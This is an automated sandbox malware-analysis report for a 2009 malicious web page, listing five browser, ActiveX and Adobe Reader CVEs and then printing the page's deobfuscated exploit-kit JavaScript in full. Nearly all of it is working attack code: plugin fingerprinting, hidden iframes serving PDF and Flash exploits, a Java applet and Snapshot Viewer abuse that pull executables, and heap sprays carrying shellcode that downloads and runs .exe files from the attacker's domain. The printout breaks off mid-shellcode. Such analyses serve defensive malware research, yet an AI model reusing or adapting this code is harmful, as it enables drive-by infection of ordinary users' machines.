Analysis report for http://day-evryday.cn/news.php
Sample Overview
| URL | http://day-evryday.cn/news.php |
|---|---|
| MD5 | 3a2ffc74c6c2048de920c9ce26ca3264 |
| Analysis Started | 2009-10-08 17:46:47 |
| Report Generated | 2009-10-08 17:47:11 |
| Jsand version | 1.03.02 |
See the report for domain day-evryday.cn.
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Office Snapshot Viewer | The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine | CVE-2008-2463 |
| Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659 |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
| MsVidCtl Overflow | Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter | CVE-2008-0015 |
Deobfuscation results
Evals
- (repeated 1 time)
function ehjqsy(){ if (1 == 2){ setTimeout('location.href = "http://lib.ru/WEBMASTER/robots.txt"', 5000); } else { setTimeout('location.href = "http://lib.ru/WEBMASTER/robots.txt"', 9000); } } function dglwx(){ var cepv = false; if (navigator.plugins && navigator.plugins.length){ for (var chqrw = 0; chqrw < navigator.plugins.length; chqrw ++ ){ if (navigator.plugins[chqrw].description.indexOf('Adobe Acrobat') !=- 1){ cepv = true; break ; } if (navigator.plugins[chqrw].description.indexOf('Adobe PDF') !=- 1){ cepv = true; break ; } } } else if (window.ActiveXObject){ var ceilpu = null; try { ceilpu = new ActiveXObject('AcroPDF.PDF'); } catch (e){ } if (!ceilpu){ try { ceilpu = new ActiveXObject('PDF.PdfCtrl'); } catch (e){ } } if (ceilpu){ cepv = true; } } if (cepv){ var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf("firefox") !=- 1){ var beix = document.createElement('embed'); beix.setAttribute('src', './giquv.pdf'); beix.setAttribute('href', './giquv.pdf'); beix.setAttribute('type', 'application/pdf'); beix.setAttribute('width', 10); beix.setAttribute('height', 5); beix.setAttribute('style', 'display:none;'); document.body.appendChild(beix); } else { var beix = document.createElement('iframe'); beix.setAttribute('src', './giquv.pdf'); beix.setAttribute('width', 16); beix.setAttribute('height', 12); beix.setAttribute('style', 'display:none;'); document.body.appendChild(beix); } setTimeout(hpuw(), 476); return ; } hpuw(); return ; } function hpuw(){ var PlayerVersion = [0, 0, 0]; if (navigator.plugins && navigator.mimeTypes.length){ var x = navigator.plugins["Shockwave Flash"]; if (x && x.description){ PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace( /(\s+r|\s+b[0-9]+)/, ".").split("."); } } else { try { var fv = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); if (fv != null){ PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(","); } } catch (e){ rtxy(); return ; } } var version1 = PlayerVersion[0] != null ? parseInt(PlayerVersion[0]) : 0; var version2 = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0; var version3 = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0; if (version1 == 9 && version3 < 124){ var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf("firefox") !=- 1){ var swfelement = document.createElement('embed'); document.body.appendChild(swfelement); swfelement.width = '1'; swfelement.height = '1'; swfelement.src = './manual.swf'; swfelement.type = 'application/x-shockwave-flash'; } else { var swfelement = document.createElement('iframe'); swfelement.setAttribute('src', './manual.swf'); swfelement.setAttribute('width', 200); swfelement.setAttribute('height', 200); swfelement.setAttribute('style', 'display:none;'); document.body.appendChild(swfelement); } } rtxy(); } function rtxy(){ var rwoLXUtl = ' <applet code="myf.y.AppletX.class" archive="http://day-evryday.cn/sdfg.jar" width="300" he ight="300">' + '<param name="data" value="http://day-evryday.cn/dshdsgfh4.exe?jas">' + '<param name="cc" value="1">' + '</applet>'; var NZWhjVxX = document.createElement("div"); NZWhjVxX.innerHTML = rwoLXUtl; document.body.appendChild(NZWhjVxX); dhltx(); } function dhltx(){ var shellcode = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6473%u7367%u3567%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6164%u2D79%u7665%u7972%u6164%u2E79 %u6E63%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace)bigblock += bigblock; var fillblock = bigblock.substring(0, slackspace); var block = bigblock.substring(0, bigblock.length - slackspace); while (block.length + slackspace < 0x40000){ block = block + block + fillblock; } var memory = new Array(); for (var i = 0; i < 350; i ++ ){ memory[i] = block + shellcode; } var hnorxz = document.createElement('object'); hnorxz.setAttribute('width', 1); hnorxz.setAttribute('height ', 1); hnorxz.setAttribute('data', './cdnyds.jpg'); hnorxz.setAttribute('classid', 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'); document.body.appendChild(hnorxz); cquxz(); } function cquxz(){ var diqru; var dsvx; var bloq = new Array(); bloq[0] = 'c:/Program Files/Outlook Express/wab.exe'; bloq[1] = 'd:/Program Files/Outlook Express/wab.exe'; bloq[2] = 'e:/Program Files/Outlook Express/wab.exe'; try { var dsvx = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); } catch (e){ try { var dsvx = document.createElement('object'); dsvx.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'); dsvx.setAttribute('id', 'dsvx'); dsvx.setAttribute('width', '1'); dsvx.setAttribute('height', '1'); document.body.appendChild(dsvx); } catch (e){ ehjqsy(); return ; } } if (dsvx = '[object]'){ for (diqruin bloq){ try { dsvx = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); var buf = bloq[diqru]; dsvx.Zoom = 0; dsvx.ShowNavigationButtons = false; dsvx.AllowContextMenu = false; dsvx.SnapshotPath = 'http://day-evryday.cn/fgnqv7.exe'; dsvx.CompressedPath = buf; dsvx.PrintSnapshot(); var bdgkq = document.createElement('iframe'); bdgkq.setAttribute('id', 'bdgkq'); bdgkq.setAttribute('src', 'ldap://127.0.0.1'); bdgkq.setAttribute('width', 1); bdgkq.setAttribute('height', 1); bdgkq.setAttribute('style', 'display:none;'); document.body.appendChild(bdgkq); var ahjko = setInterval(eghrsz(), 2100); } catch (e){ ehjqsy(); return ; } } } ehjqsy(); return ; } function eghrsz(){ if (dsvx.readyState == 4){ clearInterval(ahjko); } } dglwx();
- (repeated 1 time)
function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; } function util_printf(){ var payload = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6C69%u6F6D%u2E32%u7865%u0065%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E %u2F6E%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6563%u726D%u3275%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6164%u2D79%u7665%u7972%u6164%u2E79 %u6E63%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); var mem_array = new Array(); var cc = 0x0c0c0c0c; var addr = 0x400000; var sc_len = shellcode.length * 2; var len = addr - (sc_len + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var count2 = (cc - 0x400000) / addr; for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function collab_geticon(){ if (app.doc.Collab.getIcon){ var arry = new Array(); var vvpethya = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6C69%u7170%u2E32%u7865%u0065%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E %u2F6E%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"); var hWq500CN = vvpethya.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." + tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } function pdf_start(){ var version = app.viewerVersion.toString(); version = version.replace(/\D/g, ''); var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2)); if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); } if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); } if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); } } pdf_start();
- (repeated 1 time)
function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; } function util_printf(){ var payload = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u642F%u7961%u652D%u7276%u6479%u7961%u632E%u2F6E %u6762%u706E%u3278%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6164%u2D79%u7665%u7972%u6164%u2E79 %u6E63%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 